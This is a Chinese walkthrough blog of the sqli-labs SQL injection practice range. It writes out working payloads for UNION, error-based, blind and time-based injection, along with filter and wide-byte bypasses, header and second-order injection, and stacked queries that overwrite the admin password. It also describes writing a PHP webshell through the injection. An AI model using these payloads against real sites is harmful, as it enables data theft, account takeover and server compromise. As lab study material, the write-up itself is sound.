SQL注入从入门到进阶:sqli-labs靶场通关笔记
目录
环境搭建
显错SQL注入基本步骤(以Less-1为例)
1)判断类型
2)构造闭合
3)查询字段数
4)显位
5)爆库
6)爆表
7)爆列
8)爆值
Less-2
Less-3
Less-4
Less-5
updatexml报错
Less-6
Less-7
写马
Less-8
布尔盲注
1)猜解库名长度
2)猜解库名
3)猜解表名
4)猜解列名
Less-9
时间盲注
1)猜解库名长度
2)猜解库名
3)猜解表名
4)猜解列名
Less-10
Less-11
Less-12
Less-13
Less-14
Less-15
Less-16
Less-17
Less-18(由于自身环境问题 一直到22题都没有做完)
请求头注入
Less-23
注释过滤
Less-24
二次注入
Less-25
and or过滤
双写绕过
Less-26
and or 注释 空格 换行过滤
Less-27
Less-28
Less-29
参数污染
Less-30
Less-31
Less-32
宽字节逃逸注入
Less-33
Less-34
Less-35
Less-36
Less-37
Less-38
堆叠注入
Less-39
Less-40
Less-41
Less-42
堆叠注入和update报错
Less-43
Less-44
Less-45
Less-46
Less-47
Less-48
Less-49
Less-50
堆叠写马
Less-51
Less-52
Less-53
Less-54~Less-64
环境搭建
详细环境搭建参考 sql-labs靶场环境搭建(手把手教你如何搭建)_BetterDream的博客-CSDN博客_sql靶场搭建
上述教程出现问题时 再参考这个 搭建sqli-labs遇到的问题_学习渗漏的小东的博客-CSDN博客
环境搭建完成后进入题目
接下来正式开始SQL注入!
显错SQL注入基本步骤(以Less-1为例)
进入页面后 提示输入带有参数的id值
在url网址中进行输入 sql/Less-1/?id=1 查看回显
1)判断类型
?id=1 and 1=1
?id=1 and 1=2
均未报错 初步判断字符型注入
?id=1' and 1=1
发现报错
2)构造闭合
字符型注入因为有''的缘故 需要构造闭合
?id=1' and 1=1 -- q (--用来注释本行 空格加q防止--被浏览器不执行)
成功闭合
3)查询字段数
这里用对分查找思想
?id=1' order by 1 -- q
?id=1' order by 5 -- q
?id=1' order by 3 -- q
?id=1' order by 4 -- q
得出字段数为3
4)显位
?id=1' union select 1,2,3 -- q
此时发现 虽然没有报错 但是并没有得到回显位置
这是因为id=1的查询结果覆盖了回显 只需要将id查询的值调整一下 这里我改为100
成功回显
5)爆库
?id=100' union select 1,2,database() -- q
得到数据库名 security
6)爆表
?id=100' union select 1,2,table_name from information_schema.tables where table_schema='security' -- q
7)爆列
?id=100' union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='emails' -- q
8)爆值
?id=100' union select 1,2,id from emails -- q
Less-2
1)判断类型
and 1=1
and 1=2
判断为数字型注入
2)查询字段数
order by 3
order by 4
字段数为3
3)显位
union select 1,2,3 (id值改为100防止覆盖 后续题目有被数据覆盖时就不再特意表明了)
4)爆库
union select 1,2,database()
5)爆表
union select 1,2,table_name from information_schema.tables where table_schema='security'
6)爆列
union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='emails'
7)爆值
union select 1,2,id from emails
Less-3
1)判断类型
and 1=1
and 1=2
' and 1=2
判断为字符型注入
2)构造闭合
注意到报错信息中的信息
回推sql语句为
select * from * where id=(' ')
根据语句构造payload
1') and 1=1 -- q
没有报错说明闭合成功
3)显位
union select 1,2,3
4)爆库
union select 1,2,database()
5)爆表
union select 1,2,table_name from information_schema.tables where table_schema='security'
6)爆列
union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='emails'
7)爆值
union select 1,2,id from emails
Less-4
1)判断类型
and 1=1
and 1=2
初步判断为字符型注入
" and 1=2
字符型注入
2)构造闭合
注意报错信息
回推SQL语句为
select * from * where id=(" ")
根据语句构造payload
") and 1=1 -- q
3)查询字段数
order by 3
order by 4
4)显位
union select 1,2,3
5)爆库
union select 1,2,database()
6)爆表
union select 1,2,table_name from information_schema.tables where table_schema='security'
7)爆列
union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='emails'
8)爆值
union select 1,2,id from emails
Less-5
1)判断类型
and 1=1
and 1=2
' and 1=2
字符型注入
2)构造闭合
' and 1=1 -- q
3)查询字段数
order by 3
order by 4
4)显位
union select 1,2,3
发现即使调整了id的值 并没有产生回显点
没有显错位的注入 可以考虑从盲注入手
但这里先不采用盲注 用另一种报错信息方式updatexml来回显
updatexml报错
updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据
格式简化 updatexml(xx,concat(xx),xx)
concat函数用来拼接字符
把第二个参数改为非xpath格式 就会报错 但报错的信息是什么呢?
他会把校验失败的数据爆出来
第一个和第二个参数可以随便写 因为我们需要的是第二个参数的报错信息
5)爆库
清楚以上之后 接下来继续做题
既然没有回显点 那我们就构造updatexml语句
updatexml(1,concat('!',database(),'!'),1)
concat中的 ! 就是错误格式 会导致报错
6)爆表
updatexml(1,concat('!',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'!'),1)
limit 0,1 用来查询从第0位开始往后一位的数值
7)爆列
updatexml(1,concat('!',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'!'),1)
8)爆值
updatexml(1,concat('!',(select id from emails limit 0,1),'!'),1)
Less-6
1)判断类型
and 1=1
and 1=2
" and 1=2
2)构造闭合
" and 1=1 -- q
3)查询字段数
order by 3
order by 4
4)爆库
updatexml(1,concat('!',database(),'!'),1)
5)爆表
updatexml(1,concat('!',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'!'),1)
6)爆列
updatexml(1,concat('!',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'!'),1)
7)爆值
updatexml(1,concat('!',(select id from emails limit 0,1),'!'),1)
Less-7
本题和以上题目解法不一样 涉及到一句话木马内容
前面判断和构造闭合就不重复了 重点讲后半部分
闭合为 ?id=1')) -- q
查询字段数
order by 3
order by 4
字段数为3
写马
先检查mysql的配置文件my.ini 是否设置secure这一条 经过实测 设置完成后需要重启电脑才能生效 这是phpstudy的一个小bug
判断完字段数后就进行写马
此语句用法就是将2位置构造函数的数据输出到自己创建的文件shell.php中
放入url中执行
代码如下 具体后面的文件路径按自己实际情况来编写 不要照搬我的路径
虽然页面报错 但是打开Less-7的文件夹 发现多了shell.php文件
打开文件
eval会将()中的内容当作php代码进行执行
$_REQUEST用来接受POST GET COOKIE传参
实例
url中输入 sql/Less-7/shell.php?1=phpinfo();
?代表传参 后面1=phpinfo();就是传参的值
再之后就可以利用sql登入工具 进入到后台 取得服务器的权限
Less-8
布尔盲注
按显错步骤往下做的时候发现 此题根本没有显错位 这个时候就可以利用盲注的方式去尝试
步骤
接下来进行盲注解析
1)猜解库名长度
用对分查找思想
and length(database())>1
and length(database())>10
and length(database())>5
and length(database())>7
and length(database())>8
字段数为8
2)猜解库名
猜解库名就需要用到ASCII码
对照ASCII码进行逐字猜解
猜解时可以参考命名规则 MySQL命名规范_卫星恋天的博客-CSDN博客_mysql命名规范 提高效率
(ascii(substr(database(),1,1)))=115 返回正常,说明数据库名称第一位是s
(ascii(substr(database(),2,1)))=101 返回正常,说明数据库名称第一位是e
以此类推
3)猜解表名
(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 如果返回正常 说明数据库表名的第一个的第一位是e
以此类推
4)猜解列名
(ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)))=105 如果返回正常 说明emails表中的列名的第一位是i
Less-9
时间盲注
同样按照盲注的手法,尝试后发现这里无论输入什么条件,回显的结果都是一个,这就证明无法用布尔盲注的做法了,要尝试使用时间盲注
语法格式 if(xx,sleep(),1)
if用来判断条件是否成立 当第一个条件满足时 会执行第二个条件
sleep用来延长页面显示时间 当第一个条件成立时 页面会延长显示时间
1)猜解库名长度
1' and if(length(database())=8,sleep(5),1) -- q
页面延时五秒显示 库名长度为8
2)猜解库名
if((ascii(substr(database(),1,1))=115),sleep(5),1)
页面演示五秒显示 库名第一个字符为s
以此类推
3)猜解表名
if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1)
4)猜解列名
if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105),sleep(5),1)
Less-10
此题做法与之前一样 只是闭合的区别
1" and if(length(database())=8,sleep(5),1) -- q
后面步骤不再重复
Less-11
首先能发现,此题的传参方式是和以往是不相同的,这次变成了post传参,但他们的注入方式是差不多的
直接在username输入框中输入构造的payload
小技巧:尝试万能闭合:'or 1=1 -- q
1)查询字段数
'or 1=1 order by 2 -- q
'or 1=1 order by 3 -- q
字段数为2
2)显位
'union select 1,2 -- q
3)爆库
'union select 1,database() -- q
4)爆表
'union select 1,table_name from information_schema.tables where table_schema='security' -- q
5)爆列
'union select 1,column_name from information_schema.columns where table_schema='security' and table_name='emails' -- q
6)爆值
'union select 1,id from emails -- q
Less-12
此题只是构造闭合的区别
") or 1=1 -- q
后续步骤不再重复
Less-13
此题采用 updataxml报错注入
1)爆库
')or updatexml(1,concat('!',(select database()),'!'),1) -- q
2)爆表
')or updatexml(1,concat('!',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'!'),1) -- q
3)爆列
')or updatexml(1,concat('!',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'!'),1) -- q
4)爆值
')or updatexml(1,concat('!',(select id from emails limit 0,1),'!'),1) -- q
Less-14
此题也是做法一样 只是闭合的区别
此题闭合为 "or 1=1 -- q
后续步骤不再重复
Less-15
此题没有报错点 因此用盲注的做法
此题闭合为 'or 1=1 -- q
后续步骤不再重复
Less-16
此题采用盲注做法
此题闭合为 ")or 1=1 -- q
后续步骤不再重复
Less-17
此题采用updataxml报错方法
此题闭合为 'or 1=1 -- q
需要注意的是此题传参的地方在password 所以需要在下面的输入框输入payload 上面的随意
'or updatexml(1,concat('!',(select database()),'!'),1) -- q
Less-18(由于自身环境问题 一直到22题都没有做完)
请求头注入
此题很明显能看到ip地址的显示 自然而然的想到注入点在请求头部分
用burp抓包分析 根据上图在请求头部分进行注入
对User-Agent进行注入
截取到如下数据包
发送至重发器repeater 在重发器User-Agent中修改语句
'and updatexml(1,concat('!',(select database()),'!'),1) -- q
点击go 发现页面并没有变化
这是为什么呢? 打开源码进行分析
可以看到这条语句中 不止传参了User-agent 对后面两个参数也进行了传递
所以原来的payload只闭合了前面User-agent位置 后面两个参数并未闭合
根据以上 构造新的payload
' and updatexml(1,concat('!',(select database()),'!'),1),1,1)-- q
再次进行注入
//这里卡着了导致一直到22题都没有做
Less-23
注释过滤
此题采用updataxml报错 与之前题目不同的是 之前的注释符号都被过滤了 包括 -- #
这时就需要在语句后半部分再构造一个闭合
源码分析:
select * from * where id='' (原语句)
select * from * where id='1' and 1=1 or '1'='1' 这样就成功构造了闭合 我们放入的语句是 1' and 1=1 or '1'='1
根据上述构造payload
1' and updatexml(1,concat('!',database(),'!'),1) or '1'='1
代入url中 成功爆库
后续步骤一样 不再重复
Less-24
二次注入
此题解法有变化
分析源码
在login.php中发现 如果对username进行构造闭合 可以形成二次注入
构造payload admin'#
语句就变成了
SELECT * FROM users WHERE username='admin‘# and password='$password'
后面password就被注释掉了
用admin'#进行注册 密码随意
注册之后登录admin’#
修改密码 修改完成之后退出登录
虽然创建的是admin'# 但是进行修改密码时 连同admin的密码也被修改了 因为我们登录时注释掉了admin的password验证
用admin进行登录 密码为刚才修改的新密码
登录成功
此题展示了二次注入的危害 黑客恶意登录时可能会对管理员admin进行密码修改的恶意操作造成巨大危害
Less-25
and or过滤
此题有and or过滤
在构造闭合时 当输入and或or时 会发生报错
在错误信息中看到 and直接消失了
这时就需要用其他字符替换and和or
sql语法中 逻辑运算符&&等同and的用法 ||等同于or的用法
需要注意的是 直接在url中用&&替换and还是会报错 这时因为在url栏中&&还有其他含义(代表多个传参的意思) 此时需要对&&进行url编码
&&编码后为%26%26 代入到语句中 1'%26%26 1=1 -- q
页面正常回显
双写绕过
继续按updatexml报错注入的步骤做时 在爆表时会遇到报错 这是因为information中的or被识别 并且被替换成了空
但是此处并不能用or进行url编码替换的方式 因为这在sql语句中是并不成立的
这里特别有意思的应对方法是 将information改为infoorrmation
因为会过滤or 所以我们输入infoorrmation时会被自动改成information 从而绕过过滤
输入payload(注意将||转换url编码)
1' ||%20 updatexml(1,concat('!',(select table_name from infoorrmation_schema.tables where table_schema='security' limit 0,1),'!'),1) -- q
成功爆出表名
后续步骤不再重复
Less-26
and or 注释 空格 换行过滤
此题不仅在and和or进行了过滤 同时对注释符号进行过滤 还有空格和换行
不过做法还是基本不变 将被注释的地方用其他替换
空格注释 可以改为 %a0 %0a ()
url编码 || %20%7C%7C
&& %26%26
payload如下
1' && '1'='1 注释部分转换成url编码后 1"%20%7C%7C 1 %26%26 '1'='1
爆库名
|| updatexml(1,concat('!',(select(database())),'!'),1)||'1'='1
转换为url编码(空格用()代替)
%20%7C%7C updatexml(1,concat('!',(select(database())),'!'),1)%20%7C%7C '1'='1
成功爆库
爆表
|| updatexml(1,concat('!',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security')),'!'),1) || '1'='1
真的好长 这里我用group——concat输出table 实测的时候limit我搞不出闭合.......(我好菜)
爆列
这里的and用aandd代替
|| updatexml(1,concat('!',(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='emails'))),'!'),1) || '1'='1
爆值
|| updatexml(1,concat('!',(select(group_concat(id))from(emails)),'!'),1)|| '1'='1
总结:千万千万要注意各个括号闭合以及过滤字符的转换!!!(我在做的时候各种对照前后括号闭合 差点没把我眼睛看花......) 太费眼睛和耐心了这题目
Less-27
此题在原有过滤上对select union进行过滤
只需改一下大小写
|| updatexml(1,concat('!',(sElEcT(group_concat(table_name))from(information_schema.tables)where(table_schema='security')),'!'),1) || '1'='1
Less-28
此题在原有过滤上对select union进行过滤
这题也可以换盲注进行注入
判断数据库长度
')and(length(database())=8)||('1')=('1
后续步骤不再重复
Less-29
参数污染
此题用最开始的联合注入和显错就可以做
查阅相关资料发现 此题旨在尝试参数污染传参 第一个参数传给jsp处理 第二个参数传给php处理 从而绕过
?id=1&id=100' union select 1,2,3 -- q
Less-30
此题也是尝试参数污染
和上题做法一模一样 闭合为 "
Less-31
此题也是尝试参数污染
和上题做法一模一样 闭合为 ")
Less-32
宽字节逃逸注入
%df和\会组成繁体的運
payload: ?id=1 %df' and 1=1 -- q
在爆表名的时候 发现后面语句的单引号也被注释了
此时在后面语句中再进行宽字节绕过显然会发生语法错误 那就进行替换
'security' 改为database() 'emails'改为十六进制输入0x7573657273
爆表
?id=100 %df' union select 1,2,table_name from information_schema.tables where table_schema=database() -- q
爆列
?id=100 %df' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=0x7573657273 -- q
爆值
?id=100 %df' union select 1,2,id from emails -- q
Less-33
此题和上题注入步骤一样
区别是less32手动加转义 本题用了addslashes()函数 在下面这些预定义符号前加转义
单引号 ' 双引号 " 反斜杠 \ 空字符 NULL
Less-34
此题再次发现反斜杠,利用之前所说的%df发现并没有效果
这是因为%df是url编码,这里我们可以通过汉字的方式去绕过,和%df类似,一些汉字的编码为一个三字节的编码,可以将三个字节拆开来看,前两个为一组,后面那个和\相编码为一个两字节绕过,从而单引号逃逸
payload: 汉' or 1=1 -- q
Less-35
此题狡猾的很 根本不用构造闭合 直接union select查询就行了
union select 1,2,3 -- q 后续步骤不再重复
Less-36
此题和32题做法一模一样 只不过运用的函数不同
?id=1 %df' and 1=1 -- q
后续步骤不再重复
Less-37
此题做法和34题一样
payload: 汉' or 1=1 -- q
Less-38
堆叠注入
之后便可以输入查询语句直接查询想要的数据
payload: ?id=1';insert into users(id,username,password) values ('100','100','100') -- qwe
在数据库中查看结果
发现最后一行被插入了新值
Less-39
此题和上题做法类似
payload: ?id=1;insert into users(id,username,password) values ('101','101','101') -- qwe
数据库中出现新值
Less-40
payload: ?id=1');insert into users(id,username,password) values ('102','102','102') -- qwe
数据库中
Less-41
payload:?id=1;insert into users(id,username,password) values ('104','104','104')%20 -- qwe
数据库中
Less-42
堆叠注入和update报错
本题除了堆叠注入 还可以运用updata报错
先用万能密码注入 发现在username处无法注入成功 在password中可以注入成功
payload: ' or 1=1 -- q
1)updatexml报错
退出登录后 输入payload: ' and updatexml(1,concat('!',database(),'!'),1) -- q
后续和updatexml报错步骤一样
2)堆叠注入
假设我们要利用admin管理员身份进行登录 可以利用堆叠注入构造payload
payload: 1';update security.users set password='123456' where username="admin"#
在password处输入payload 发现登录失败 问题不大 返回后用admin登录 密码为payload中构造的
登录成功!
Less-43
此题只是闭合的区别 闭合为') or 1=1 -- q
Less-44
此题只是闭合的区别 闭合为 ' or 1=1 -- q
此题也可以用盲注解
Less-45
此题只是闭合的区别 闭合为 ') or 1=1 -- q
Less-46
此题发现页面并不一样 提示用sort去查询
输入?sort=1
输入?sort=2
输入?sort=3
发现每次改变参数之后 表中数据位置会发生改变 分析之后得出参数值为多少就会对相应的字段进行排序 这和联合查询中的order by 用法相类似
之后可以用多种方式进行注入 这里我选择updatexml报错
?sort=1 and updatexml(1,concat('!',database(),'!'),1) -- q
Less-47
此题只是闭合的区别
?sort=1' and updatexml(1,concat('!',database(),'!'),1) -- q
Less-48
此题发现updatexml报错没有报错信息
用布尔盲注没有回显
那么直接用时间盲注
payload:?sort=1 and if(ascii(substr(database(),1,1))=115,sleep(5),0)
等于115时页面回显时间延长 说明条件成立
大于115时 页面回显时间未延长 说明条件不成立
Less-49
此题只是闭合的区别 闭合为 ?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0) -- q
Less-50
堆叠写马
payload: (按照自己的文件地址来写)
成功写马
赋值查询 成功回显phpinfo()
Less-51
此题只是闭合的区别
payload:
Less-52
此题和50题一模一样
因为此题没有报错点 也可以采用盲注
Less-53
此题我又用了时间盲注(反正这几题来回切换手法)
payload:?sort=1 ' and if(length(database())=8,sleep(5),1) -- q
=8时回显延长
大于8时没有回显延长
Less-54~Less-64
从54题开始 每题有固定的输入次数 一旦超过次数 会刷新数据库数据
从这里开始 就是对整个sql靶场的复习了 后续就不再写步骤了